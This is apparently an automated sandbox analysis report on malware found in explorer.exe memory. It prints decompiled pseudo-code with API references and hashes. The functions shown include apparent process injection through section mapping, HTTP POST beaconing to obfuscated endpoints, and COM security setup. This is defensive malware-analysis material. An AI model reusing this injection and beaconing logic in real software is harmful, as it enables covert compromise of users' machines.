        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
        • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
        • Opcode Fuzzy Hash: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
        • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 59%
        			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
        				signed int _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				char _v32;
        				intOrPtr _v36;
        				struct HINSTANCE__* _v40;
        				char _v44;
        				char _v56;
        				char _v72;
        				struct _WNDCLASSEXA _v120;
        				intOrPtr _t69;
        				intOrPtr _t71;
        				intOrPtr _t75;
        				intOrPtr _t80;
        				intOrPtr _t92;
        				intOrPtr _t95;
        				intOrPtr _t96;
        				struct HWND__* _t106;
        				intOrPtr* _t113;
        				struct HINSTANCE__* _t116;
        				intOrPtr _t120;
        				intOrPtr _t126;
        				intOrPtr _t131;
        				intOrPtr _t134;
        				intOrPtr _t136;
        				intOrPtr _t139;
        				char _t140;
        				intOrPtr _t141;
        
        				_t69 =  *0xde688; // 0xf0000
        				_t126 = __ecx;
        				_t134 = __edx;
        				_t116 = 0;
        				_v36 = __edx;
        				_v16 = 0;
        				_v44 = 0;
        				_v40 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				_v24 = 0;
        				_v20 = __ecx;
        				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
        					E000CE23E(0x1f4);
        					_t116 = 0;
        				}
        				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
        				_v28 = _t116;
        				if( *_t113 != 0x4550) {
        					L12:
        					if(_v8 != 0) {
        						_t75 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
        						_v8 = _v8 & 0x00000000;
        					}
        					L14:
        					if(_v12 != 0) {
        						_t136 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
        					}
        					if(_v16 != 0) {
        						_t71 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t71 + 0x20))(_v16);
        					}
        					return _v8;
        				}
        				_push(_t116);
        				_push(0x8000000);
        				_v44 =  *((intOrPtr*)(_t113 + 0x50));
        				_push(0x40);
        				_push( &_v44);
        				_push(_t116);
        				_push(0xe);
        				_push( &_v16);
        				_t80 =  *0xde780; // 0x0
        				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
        					goto L12;
        				}
        				_v120.style = 0xb;
        				_v120.cbSize = 0x30;
        				_v120.lpszClassName =  &_v56;
        				asm("movsd");
        				_v120.lpfnWndProc = DefWindowProcA;
        				asm("movsd");
        				asm("movsd");
        				asm("movsb");
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				asm("movsb");
        				_v120.cbWndExtra = 0;
        				_v120.lpszMenuName = 0;
        				_v120.cbClsExtra = 0;
        				_v120.hInstance = 0;
        				if(RegisterClassExA( &_v120) != 0) {
        					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
        					if(_t106 != 0) {
        						DestroyWindow(_t106);
        						UnregisterClassA( &_v56, 0);
        					}
        				}
        				_t139 =  *0xde780; // 0x0
        				_push(0x40);
        				_push(0);
        				_push(2);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v12);
        				_push(GetCurrentProcess());
        				_push(_v16);
        				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
        					_t126 = _v20;
        					goto L12;
        				} else {
        					_push(0x40);
        					_push(0);
        					_push(2);
        					_push( &_v24);
        					_push(0);
        					_push(0);
        					_push(0);
        					_t126 = _v20;
        					_push( &_v8);
        					_t92 =  *0xde780; // 0x0
        					_push(_t126);
        					_push(_v16);
        					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
        						goto L12;
        					}
        					_t140 = E000C8669( *0xde688, 0x1ac4);
        					_v32 = _t140;
        					if(_t140 == 0) {
        						goto L12;
        					}
        					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
        					_t95 =  *0xde684; // 0x64f8f0
        					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
        					_t120 =  *0xde684; // 0x64f8f0
        					_t131 = _t96;
        					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
        					E000C861A( &_v32, 0x1ac4);
        					_t141 =  *0xde688; // 0xf0000
        					 *0xde688 = _t131;
        					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
        					E000CC63F(_v12, _v8, _v36);
        					 *0xde688 = _t141;
        					goto L14;
        				}
        			}

        APIs
        • RegisterClassExA.USER32 ref: 000CC785
        • CreateWindowExA.USER32 ref: 000CC7B0
        • DestroyWindow.USER32 ref: 000CC7BB
        • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
        • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
        • Opcode Fuzzy Hash: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
        • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
        				char _v8;
        				char _v16;
        				short _v144;
        				short _v664;
        				void* _t19;
        				struct HINSTANCE__* _t22;
        				long _t23;
        				long _t24;
        				char* _t27;
        				WCHAR* _t32;
        				long _t33;
        				intOrPtr _t37;
        				intOrPtr _t38;
        				void* _t49;
        				int _t53;
        				void* _t54;
        				intOrPtr* _t55;
        				void* _t57;
        
        				_t49 = __edx;
        				OutputDebugStringA("Hello qqq");
        				if(_a8 != 1) {
        					if(_a8 != 0) {
        						L12:
        						return 1;
        					}
        					SetLastError(0xaa);
        					L10:
        					return 0;
        				}
        				E000C85EF();
        				_t19 = E000C980C( &_v16);
        				_t57 = _t49;
        				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
        					goto L12;
        				} else {
        					E000C8F78();
        					GetModuleHandleA(0);
        					_t22 = _a4;
        					 *0xde69c = _t22;
        					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
        					_t24 = GetLastError();
        					if(_t23 != 0 && _t24 != 0x7a) {
        						memset( &_v144, 0, 0x80);
        						_t55 = _t54 + 0xc;
        						_t53 = 0;
        						do {
        							_t27 = E000C95C7(_t53);
        							_a8 = _t27;
        							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
        							E000C85C2( &_a8);
        							_t53 = _t53 + 1;
        						} while (_t53 < 0x2710);
        						E000D2A5B( *0xde69c);
        						 *_t55 = 0x7c3;
        						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
        						 *_t55 = 0xb4e;
        						_t32 = E000C95E1(0xdba28);
        						_a8 = _t32;
        						_t33 = GetFileAttributesW(_t32);
        						_push( &_a8);
        						if(_t33 == 0xffffffff) {
        							E000C85D5();
        							_v8 = 0;
        							_t37 =  *0xde684; // 0x64f8f0
        							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
        							 *0xde6a8 = _t38;
        							if(_t38 == 0) {
        								goto L10;
        							}
        							goto L12;
        						}
        						E000C85D5();
        					}
        					goto L10;
        				}
        			}

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
        • SetLastError.KERNEL32(000000AA), ref: 000C60D7
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
        • GetLastError.KERNEL32 ref: 000C5FEF
        • memset.MSVCRT ref: 000C6013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
        • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
        • String ID: Hello qqq
        • API String ID: 3872149766-3610097158
        • Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
        • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
        • Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
        • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
        				char _v8;
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				char _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				char _v64;
        				int _v76;
        				void* _v80;
        				intOrPtr _v100;
        				int _v104;
        				void* _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				char* _v120;
        				void _v124;
        				char _v140;
        				void _v396;
        				void _v652;
        				intOrPtr _t105;
        				intOrPtr _t113;
        				intOrPtr* _t115;
        				intOrPtr _t118;
        				intOrPtr _t121;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t131;
        				char _t133;
        				intOrPtr _t136;
        				char _t138;
        				char _t139;
        				intOrPtr _t141;
        				intOrPtr _t147;
        				intOrPtr _t154;
        				intOrPtr _t158;
        				intOrPtr _t162;
        				intOrPtr _t164;
        				intOrPtr _t166;
        				intOrPtr _t172;
        				intOrPtr _t176;
        				void* _t183;
        				void* _t185;
        				intOrPtr _t186;
        				char _t195;
        				intOrPtr _t203;
        				intOrPtr _t204;
        				signed int _t209;
        				void _t212;
        				intOrPtr _t213;
        				void* _t214;
        				intOrPtr _t216;
        				char _t217;
        				intOrPtr _t218;
        				signed int _t219;
        				signed int _t220;
        				void* _t221;
        
        				_v40 = _v40 & 0x00000000;
        				_v24 = 4;
        				_v36 = 1;
        				_t214 = __edx;
        				memset( &_v396, 0, 0x100);
        				memset( &_v652, 0, 0x100);
        				_v64 = E000C95C7(0x85b);
        				_v60 = E000C95C7(0xdc9);
        				_v56 = E000C95C7(0x65d);
        				_v52 = E000C95C7(0xdd3);
        				_t105 = E000C95C7(0xb74);
        				_v44 = _v44 & 0;
        				_t212 = 0x3c;
        				_v48 = _t105;
        				memset( &_v124, 0, 0x100);
        				_v116 = 0x10;
        				_v120 =  &_v140;
        				_v124 = _t212;
        				_v108 =  &_v396;
        				_v104 = 0x100;
        				_v80 =  &_v652;
        				_push( &_v124);
        				_push(0);
        				_v76 = 0x100;
        				_push(E000CC379(_t214));
        				_t113 =  *0xde6a4; // 0x2580780
        				_push(_t214);
        				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
        					_t209 = 0;
        					_v20 = 0;
        					do {
        						_t115 =  *0xde6a4; // 0x2580780
        						_v12 = 0x8404f700;
        						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
        						if(_t213 != 0) {
        							_t195 = 3;
        							_t185 = 4;
        							_v8 = _t195;
        							_t118 =  *0xde6a4; // 0x2580780
        							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
        							_v8 = 0x3a98;
        							_t121 =  *0xde6a4; // 0x2580780
        							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t124 =  *0xde6a4; // 0x2580780
        							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t127 =  *0xde6a4; // 0x2580780
        							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
        							_t131 =  *0xde6a4; // 0x2580780
        							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
        							if(_a24 != 0) {
        								E000C980C(_a24);
        							}
        							if(_t186 != 0) {
        								_t133 = 0x8484f700;
        								if(_v112 != 4) {
        									_t133 = _v12;
        								}
        								_t136 =  *0xde6a4; // 0x2580780
        								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
        								_v8 = _t216;
        								if(_a24 != 0) {
        									E000C980C(_a24);
        								}
        								if(_t216 != 0) {
        									_t138 = 4;
        									if(_v112 != _t138) {
        										L19:
        										_t139 = E000C95C7(0x777);
        										_t217 = _t139;
        										_v12 = _t217;
        										_t141 =  *0xde6a4; // 0x2580780
        										_t218 = _v8;
        										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
        										E000C85C2( &_v12);
        										if(_a24 != 0) {
        											E000C980C(_a24);
        										}
        										if(_v28 != 0) {
        											L28:
        											_v24 = 8;
        											_push(0);
        											_v32 = 0;
        											_v28 = 0;
        											_push( &_v24);
        											_push( &_v32);
        											_t147 =  *0xde6a4; // 0x2580780
        											_push(0x13);
        											_push(_t218);
        											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
        												_t219 = E000C9749( &_v32);
        												if(_t219 == 0xc8) {
        													 *_a20 = _v8;
        													 *_a12 = _t213;
        													 *_a16 = _t186;
        													return 0;
        												}
        												_t220 =  ~_t219;
        												L32:
        												_t154 =  *0xde6a4; // 0x2580780
        												 *((intOrPtr*)(_t154 + 8))(_v8);
        												L33:
        												if(_t186 != 0) {
        													_t158 =  *0xde6a4; // 0x2580780
        													 *((intOrPtr*)(_t158 + 8))(_t186);
        												}
        												if(_t213 != 0) {
        													_t203 =  *0xde6a4; // 0x2580780
        													 *((intOrPtr*)(_t203 + 8))(_t213);
        												}
        												return _t220;
        											}
        											GetLastError();
        											_t220 = 0xfffffff8;
        											goto L32;
        										} else {
        											GetLastError();
        											_t162 =  *0xde6a4; // 0x2580780
        											 *((intOrPtr*)(_t162 + 8))(_t218);
        											_t218 = 0;
        											goto L23;
        										}
        									}
        									_v12 = _t138;
        									_push( &_v12);
        									_push( &_v16);
        									_t172 =  *0xde6a4; // 0x2580780
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
        										L18:
        										GetLastError();
        										goto L19;
        									}
        									_v16 = _v16 | 0x00003380;
        									_push(4);
        									_push( &_v16);
        									_t176 =  *0xde6a4; // 0x2580780
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
        										goto L19;
        									}
        									goto L18;
        								} else {
        									GetLastError();
        									L23:
        									_t164 =  *0xde6a4; // 0x2580780
        									 *((intOrPtr*)(_t164 + 8))(_t186);
        									_t186 = 0;
        									goto L24;
        								}
        							} else {
        								GetLastError();
        								L24:
        								_t166 =  *0xde6a4; // 0x2580780
        								 *((intOrPtr*)(_t166 + 8))(_t213);
        								_t213 = 0;
        								goto L25;
        							}
        						}
        						GetLastError();
        						L25:
        						_t204 = _t218;
        						_t209 = _v20 + 1;
        						_v20 = _t209;
        					} while (_t209 < 2);
        					_v8 = _t218;
        					if(_t204 != 0) {
        						goto L28;
        					}
        					_t220 = 0xfffffffe;
        					goto L33;
        				}
        				_t183 = 0xfffffffc;
        				return _t183;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
        • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 28%
        			E000D16B8(signed int* _a4) {
        				char _v8;
        				_Unknown_base(*)()* _v12;
        				_Unknown_base(*)()* _v16;
        				char _v20;
        				_Unknown_base(*)()* _t16;
        				_Unknown_base(*)()* _t17;
        				void* _t22;
        				intOrPtr* _t28;
        				signed int _t29;
        				signed int _t30;
        				struct HINSTANCE__* _t32;
        				void* _t34;
        
        				_t30 = 0;
        				_v8 = 0;
        				_t32 = GetModuleHandleA("advapi32.dll");
        				if(_t32 == 0) {
        					L9:
        					return 1;
        				}
        				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
        				_v12 = _t16;
        				if(_t16 == 0) {
        					goto L9;
        				}
        				_t17 = GetProcAddress(_t32, "CryptGenRandom");
        				_v16 = _t17;
        				if(_t17 == 0) {
        					goto L9;
        				}
        				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
        				if(_t28 == 0) {
        					goto L9;
        				}
        				_push(0xf0000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push( &_v8);
        				if(_v12() == 0) {
        					goto L9;
        				}
        				_t22 = _v16(_v8, 4,  &_v20);
        				 *_t28(_v8, 0);
        				if(_t22 == 0) {
        					goto L9;
        				}
        				_t29 = 0;
        				do {
        					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
        					_t29 = _t29 + 1;
        				} while (_t29 < 4);
        				 *_a4 = _t30;
        				return 0;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
        • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
        				signed int _t12;
        				signed int _t13;
        				int _t15;
        				char* _t24;
        				char* _t26;
        				char* _t28;
        				char* _t29;
        				signed int _t40;
        				char* _t43;
        				char* _t45;
        				long long* _t47;
        
        				_t12 = _a20;
        				if(_t12 == 0) {
        					_t12 = 0x11;
        				}
        				_t26 = _a4;
        				_push(_t30);
        				 *_t47 = _a12;
        				_push(_t12);
        				_push("%.*g");
        				_push(_a8);
        				_push(_t26);
        				L000D2285();
        				_t40 = _t12;
        				if(_t40 < 0 || _t40 >= _a8) {
        					L19:
        					_t13 = _t12 | 0xffffffff;
        					goto L20;
        				} else {
        					L000D22CD();
        					_t15 =  *((intOrPtr*)( *_t12));
        					if(_t15 != 0x2e) {
        						_t24 = strchr(_t26, _t15);
        						if(_t24 != 0) {
        							 *_t24 = 0x2e;
        						}
        					}
        					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
        						L11:
        						_t43 = strchr(_t26, 0x65);
        						_t28 = _t43;
        						if(_t43 == 0) {
        							L18:
        							_t13 = _t40;
        							L20:
        							return _t13;
        						}
        						_t45 = _t43 + 1;
        						_t29 = _t28 + 2;
        						if( *_t45 == 0x2d) {
        							_t45 = _t29;
        						}
        						while( *_t29 == 0x30) {
        							_t29 = _t29 + 1;
        						}
        						if(_t29 != _t45) {
        							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
        							_t40 = _t40 + _t45 - _t29;
        						}
        						goto L18;
        					} else {
        						_t6 = _t40 + 3; // 0xd09b2
        						_t12 = _t6;
        						if(_t12 >= _a8) {
        							goto L19;
        						}
        						_t26[_t40] = 0x302e;
        						( &(_t26[2]))[_t40] = 0;
        						_t40 = _t40 + 2;
        						goto L11;
        					}
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
        • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
        • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
        • SysAllocString.OLEAUT32(?), ref: 000CD764
        • SysAllocString.OLEAUT32(00000000), ref: 000CD778
        • SysFreeString.OLEAUT32(?), ref: 000CD7F3
        • SysFreeString.OLEAUT32(?), ref: 000CD7F6
        • SysFreeString.OLEAUT32(?), ref: 000CD7FB
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
        • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
        • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 30%
        			E000CD523(void* __ecx) {
        				char _v8;
        				void* _v12;
        				char* _t15;
        				intOrPtr* _t16;
        				void* _t21;
        				intOrPtr* _t23;
        				intOrPtr* _t24;
        				intOrPtr* _t25;
        				void* _t30;
        				void* _t33;
        
        				_v12 = 0;
        				_v8 = 0;
        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
        				_t15 =  &_v12;
        				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
        				if(_t15 < 0) {
        					L5:
        					_t23 = _v8;
        					if(_t23 != 0) {
        						 *((intOrPtr*)( *_t23 + 8))(_t23);
        					}
        					_t24 = _v12;
        					if(_t24 != 0) {
        						 *((intOrPtr*)( *_t24 + 8))(_t24);
        					}
        					_t16 = 0;
        				} else {
        					__imp__#2(__ecx);
        					_t25 = _v12;
        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
        					if(_t21 < 0) {
        						goto L5;
        					} else {
        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
        						if(_t21 < 0) {
        							goto L5;
        						} else {
        							_t16 = E000C8604(8);
        							if(_t16 == 0) {
        								goto L5;
        							} else {
        								 *((intOrPtr*)(_t16 + 4)) = _v12;
        								 *_t16 = _v8;
        							}
        						}
        					}
        				}
        				return _t16;
        			}

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
        • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
        • SysAllocString.OLEAUT32(00000000), ref: 000CD569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
        • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
        • Opcode Fuzzy Hash: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
        • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
